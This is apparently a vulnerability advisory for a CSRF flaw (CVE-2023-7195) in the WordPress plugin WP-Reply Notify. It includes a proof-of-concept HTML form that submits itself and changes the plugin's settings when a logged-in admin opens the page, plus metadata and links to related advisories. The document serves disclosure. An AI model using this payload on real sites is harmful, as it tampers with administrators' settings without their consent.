WP-Reply Notify <= 1.1 – Settings Update via CSRF | CVE 2023-7195 | Plugin Vulnerabilities

Description

The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

Proof of Concept

Make an admin open an HTML page containing the following:

<form action="https://example.com/wp-admin/admin.php?page=wp-reply-notify%2Fwprn-settings.php" method="POST">
    <input type="text" name="reply_receive" value="0">
    <input type="text" name="reply_notify" value="0">
    <input type="text" name="receive_email" value="0">
    <input type="text" name="items_per_page" value="10">
    <input type="text" name="keep_period" value="0">
    <input type="text" name="wprn_settings" value="Save Changes">
</form>
<script>
    document.forms[0].submit();    
</script>

Affects Plugins

wp-reply-notify

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-7195.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

72279ca0-6365-4c83-adca-4d8e5808a8c5

Timeline

Publicly Published

2024-01-23 (about 1 year ago)

Added

2024-01-23 (about 1 year ago)

Last Updated

2024-01-23 (about 1 year ago)

Other

Published

Title

Published

2025-02-17

Title

magayo Lottery Results <= 2.0.12 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-06-21

Title

FS Poster < 6.5.9 - Cross-Site Request Forgery

Published

2024-03-26

Title

RegistrationMagic < 5.3.1.0 - Cross-Site Request Forgery

Published

2022-04-26

Title

Coru LFMember <= 1.0.2 - Stored Cross-Site Scripting via CSRF

Published

2025-09-22

Title

Current Age Plugin < 1.7 - Cross-Site Request Forgery